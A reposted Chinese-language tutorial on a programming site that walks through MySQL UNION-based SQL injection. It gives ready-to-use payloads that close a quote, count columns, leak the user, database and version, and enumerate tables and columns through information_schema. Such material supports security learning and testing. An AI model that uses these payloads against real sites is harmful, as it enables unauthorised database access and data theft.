Community

Learn

Tools Library

AI Tools

Leisure

English

Home > Database > Mysql Tutorial > MYSQL注入语句实用精解_MySQL

MYSQL注入语句实用精解_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Release： 2016-06-01 13:34:39

Original

1021 people have browsed it

bitsCN.com

MYSQL注入语句实用精解

只讲字符型。

order by XX

Union select .....

1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。

1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #

上面是字符型的，注释符为 # ， CONCAT_WS 为用分隔符隔开连接的字符。

获取数据库等的信息

1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #

concat产生只是字符串连接，不用也可以，也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。

1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #

0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里，数据库知道了，表知道了，表的字段也知道了。剩下的还不会查吗。直接union 查。

库information_schema 中的表tables 有 table_schema(数据库名) 和 table_name(表名) 两个主要字段

库information_schema 中的表columns 有 table_name(表名) 和 column_name(列名) 两主要字段

就算是 order by 出来只有一个可以显示也没关系。可以用concat

如： concat(字段,0x3a,字段) 把两个字段显示出来了。中间那个是：的十六进制表示形式。

bitsCN.com

Previous article：Mysql InnoDB笔记内存_MySQL Next article：安装mysql时的一些问题_MySQL

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Latest Articles by Author

What is a NullPointerException, and how do I fix it?

2024-10-22 09:46:29
From Novice to Coder: Your Journey Begins with C Fundamentals

2024-10-13 13:53:41
Unlocking Web Development with PHP: A Beginner's Guide

2024-10-12 12:15:51
Demystifying C: A Clear and Simple Path for New Programmers

2024-10-11 22:47:31
Unlock Your Coding Potential: C Programming for Absolute Beginners

2024-10-11 19:36:51
Unleash Your Inner Programmer: C for Absolute Beginners

2024-10-11 15:50:41
Automate Your Life with C: Scripts and Tools for Beginners

2024-10-11 15:07:41
PHP Made Easy: Your First Steps in Web Development

2024-10-11 14:21:21
Build Anything with Python: A Beginner's Guide to Unleashing Your Creativity

2024-10-11 12:59:11
The Key to Coding: Unlocking the Power of Python for Beginners

2024-10-11 12:17:31

Latest Issues

function_exists() cannot determine the custom function Function test () {return true;} if (function_exists ('test')) {echo "test is function...

From 2024-04-29 11:01:01

0

3

2720

How to display the mobile version of Google Chrome Hello teacher, how can I change Google Chrome into a mobile version?

From 2024-04-23 00:22:19

0

11

2842

The child window operates the parent window, but the output does not respond. The first two sentences are executable, but the last sentence cannot be implemented.

From 2024-04-19 15:37:47

0

1

2394

There is no output in the parent window document.onclick = function(){ window.opener.document.write('I am the output of the child ...

From 2024-04-18 23:52:34

0

1

2291

Where is the courseware about CSS mind mapping? Courseware

From 2024-04-16 10:10:18

0

0

2368

Related Topics

More>

Popular Recommendations

Popular Tutorials

More>

Related Tutorials

Popular Recommendations

Latest courses

Latest Downloads

More>

Web Effects

Website Source Code

Website Materials

Front End Template